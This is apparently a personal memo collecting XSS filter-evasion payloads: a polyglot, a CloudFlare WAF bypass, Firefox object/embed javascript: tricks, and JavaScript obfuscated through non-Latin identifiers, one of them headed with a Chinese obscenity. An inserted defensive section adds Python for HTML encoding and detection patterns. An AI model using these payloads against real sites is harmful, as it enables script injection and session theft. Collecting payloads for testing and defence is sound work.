Memo
XSS Filter Evasion - OWASP Cheat Sheet Series
Cross-site scripting (XSS) cheat sheet
Testing
HackPad
CSP Evaluator
security-tutorial
Mysterious payload
'"--><svg/onload=top[30]()>${{4*9}}<script>+alert?.``</script>
- top[30]() → triggers the XSS without using the word alert
- alert?.`` → optional chaining + template literal for stealthy JS execution
- --><svg> → breaks out of an HTML comment
- ${{4*9}} → 36: SSTI / CSTI
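Defender-side handling of the payload shapes collected on this page, as an added example (not part of the original memo): context-aware output encoding that leaves each payload inert when it lands in a text node or a quoted attribute, plus a log-side heuristic that flags the distinctive features these probes share (quote-then-tag breakout, event-handler attributes, the javascript: scheme, and the `!x+x` / `x+{}` string-forging idiom behind the non-ASCII-identifier payloads). The sample inputs are constructed from the payloads on this page; the function and pattern names are this example's own.

```python
"""Added example: neutralize and detect the XSS probe shapes listed on this page."""
import html
import re

# Constructed sample set, shaped after the payloads on this page.
SAMPLES = [
    "'\"--><svg/onload=top[30]()>${{4*9}}<script>+alert?.``</script>",
    "\"><P/onpointerenter=alert(1)>",
    "<object data=# codebase=javascript:alert(document.domain)//>",
    "\"><img/src=x onerror=\"a='',b=!a+a,c=a+{}\"",
    "あ='',い=!あ+あ,う=!い+あ,え=あ+{}",
]
# Constructed benign inputs that share some characters with the probes.
BENIGN = ["hello <3 world", 'say "hi" & bye', "2 + 2 = 4, right?"]


def encode_for_html_text(value: str) -> str:
    """Text-node context: &, < and > must be escaped; quotes are harmless here."""
    return html.escape(value, quote=False)


def encode_for_html_attribute(value: str) -> str:
    """Quoted-attribute context: additionally escape both quote characters so the
    value can never close the attribute and start a new tag (the "> breakouts above)."""
    return html.escape(value, quote=True)


def render_profile(display_name: str) -> str:
    """Hypothetical template that places one untrusted value in two HTML contexts."""
    return (
        f'<span title="{encode_for_html_attribute(display_name)}">'
        f"{encode_for_html_text(display_name)}</span>"
    )


def is_inert(rendered: str) -> bool:
    """True when the only angle brackets in the output belong to the template's
    own <span ...> and </span>; escaped input contributes &lt; / &gt; instead."""
    return rendered.count("<") == 2 and rendered.count(">") == 2


# Heuristics for triage of request logs / WAF samples. Each pattern names one
# feature of the page's payloads; a hit is a signal to inspect, not a verdict.
PROBE_PATTERNS = {
    # a quote followed (within a few chars, e.g. "--") by > and a new tag
    "attribute_breakout": re.compile(r"""["'][^<>]{0,4}>\s*<"""),
    # any on*= event-handler attribute (onload=, onerror=, onpointerenter=, ...)
    "event_handler_attr": re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE),
    # javascript: scheme in data=/codebase=/href= style attributes
    "javascript_scheme": re.compile(r"javascript\s*:", re.IGNORECASE),
    # x=!y+y (forging "true"/"false") or y+{} (forging "[object Object]"):
    # the building blocks of the identifier-obfuscated payloads
    "string_forging": re.compile(r"=\s*!\S+?\+|\+\s*\{\s*\}"),
}


def classify_probe(value: str) -> list:
    """Return the names of every pattern that matches, in PROBE_PATTERNS order."""
    return [name for name, rx in PROBE_PATTERNS.items() if rx.search(value)]


def looks_like_xss_probe(value: str) -> bool:
    return bool(classify_probe(value))


if __name__ == "__main__":
    for sample in SAMPLES:
        out = render_profile(sample)
        print(f"inert={is_inert(out)} tags={classify_probe(sample)} :: {out[:70]}")
```

The encoding half is the actual control: once every `<`, `>`, `"` and `'` from the input is entity-encoded for its context, none of the breakout or event-handler payloads can leave the text node or attribute they were written into. The heuristic half is only for triage; the bare-JavaScript payloads (the Japanese, Russian and cuneiform variants) carry no HTML at all and are caught solely by the string-forging idiom, which is why that pattern is included.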
WeChat XSS
<a href="weixin://bizmsgmenu?msgmenucontent=测试内容&msgmenuid=960">显示内容</a>
CloudFlare XSS
"><P/onpointerenter=alert(1)>
Firefox XSS
<object data=# codebase=javascript:alert(document.domain)//>
OR
<embed src=# codebase=javascript:alert(document.domain)//>

"><img/src=x onerror="𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(document.domain)')()"
操你妈 XSS (Chinese-character identifiers)
<x onmousemove=操='',你=!操+操,妈=!你+操,操操=操+{},操你=你[操++],操妈=你[你操=操],你你=++你操+操,你妈=操操[你操+你你],你[你妈+=操操[操]+(你.妈+操操)[操]+妈[你你]+操你+操妈+你[你操]+你妈+操你+操操[操]+操妈][你妈](妈[操]+妈[你操]+你[你你]+操妈+操你+"(操)")()>test
Japanese XSS
あ='',い=!あ+あ,う=!い+あ,え=あ+{},お=い[あ++],か=い[き=あ], く=++き+あ,け=え[き+く], い[け+=え[あ]+(い.う+え)[あ]+う[く]+お+か+い[き]+け+お+え[あ]+か][け](う[あ]+う[き]+い[く]+か+お+"('ざこ~')")()
Russian XSS
а='',б=!а+а,в=!б+а,г=а+{},д=б[а++],е=б[ж=а], з=++ж+а,и=г[ж+з],б[и+=г[а]+(б.в+г)[а]+в[з]+д+е+б[ж]+и+д+г[а]+е][и](в[а]+в[ж]+б[з]+е+д+"('взломано')")()
𒀱='',𒁍=!𒀱+𒀱,𒂖=!𒁍+𒀱,𒃵=𒀱+{},𒄿=𒁍[𒀱++],𒅗=𒁍[𒀲=𒀱], 𒆜=++𒀲+𒀱,𒇻=𒃵[𒀲+𒆜], 𒁍[𒇻+=𒃵[𒀱]+(𒁍.𒂖+𒃵)[𒀱]+𒂖[𒆜]+𒄿+𒅗+𒁍[𒀲]+𒇻+𒄿+𒃵[𒀱]+𒅗][𒇻](𒂖[𒀱]+𒂖[𒀲]+𒁍[𒆜]+𒅗+𒄿+"('𒀱𒀲𒀱𒋻𒆜𒀲𒁂𒐫𒉿𒀜𒅔')")()